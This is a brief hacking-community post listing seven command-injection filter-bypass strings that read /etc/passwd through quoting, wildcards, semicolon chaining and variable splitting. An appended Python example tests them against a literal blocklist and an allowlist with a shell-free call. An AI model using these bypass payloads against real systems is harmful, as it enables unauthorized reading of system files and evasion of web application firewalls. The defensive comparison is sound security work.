 --- A GOPHER-LIKE INTERFACE FOR HIVE BLOCKCHAIN ---

Command Injection filter bypass

BY: @ss5h | CREATED: Jan. 29, 2018, 8:41 a.m. | VOTES: 1 | PAYOUT: $0.00

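A post went up in the community about bypassing command injection filters with wildcards. Beyond wildcards, the following are bypass methods that a WAF (a typical web application firewall) has difficulty detecting.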

cd /etc/ ; cat passwd
cat /etc/passw"d"
cat /etc/passw?
cat /etc/passw*
cat /etc/passw'd'
cat /etc/passw[a-z]
a=pas;b=swd;cat /etc/$a$b

TAGS: [ #command ] [ #injection ] [ #hacking ] [ #bypass ] [ #waf ]
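A defensive check built on the strings listed in the post, as an added example that is not part of the original post: it shows that a literal-string blocklist misses every variant, while an allowlist combined with a shell-free call rejects or neutralizes them. The names naive_blocklist_hit, is_safe_name, echo_argv and handle are hypothetical, and the child process is a stand-in for whatever program the application really runs.

```python
import re
import subprocess
import sys

# Command strings copied from the post above.
PAGE_VARIANTS = [
    'cd /etc/ ; cat passwd',
    'cat /etc/passw"d"',
    'cat /etc/passw?',
    'cat /etc/passw*',
    "cat /etc/passw'd'",
    'cat /etc/passw[a-z]',
    'a=pas;b=swd;cat /etc/$a$b',
]

def naive_blocklist_hit(text):
    """Signature-style check: flags only the literal path string."""
    return "/etc/passwd" in text

# Allowlist for a plain file name: no quotes, globs, '$', ';', '/' or spaces.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

def is_safe_name(value):
    """Accept only values made entirely of allowlisted characters."""
    return SAFE_NAME.fullmatch(value) is not None

def echo_argv(value):
    """Pass value as one argv element with no shell, so nothing is expanded.
    The child process is a stand-in (assumption) for the real program."""
    child = "import sys; sys.stdout.write(sys.argv[1])"
    done = subprocess.run([sys.executable, "-c", child, value],
                          capture_output=True, text=True, check=True)
    return done.stdout

def handle(value):
    """Hypothetical request handler: validate first, then call without a shell."""
    if not is_safe_name(value):
        raise ValueError("rejected: %r" % value)
    return echo_argv(value)

if __name__ == "__main__":
    for v in PAGE_VARIANTS:
        print("%-28s blocklist=%-5s allowlist=%s"
              % (v, naive_blocklist_hit(v), is_safe_name(v)))
    print(echo_argv("passw*"))        # arrives as the literal text, no glob
    print(handle("report-2018.txt"))  # constructed benign input
```

The blocklist column is False for every line from the post, which is the gap the post describes; the allowlist column is also False, meaning each one is refused before any process is started.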
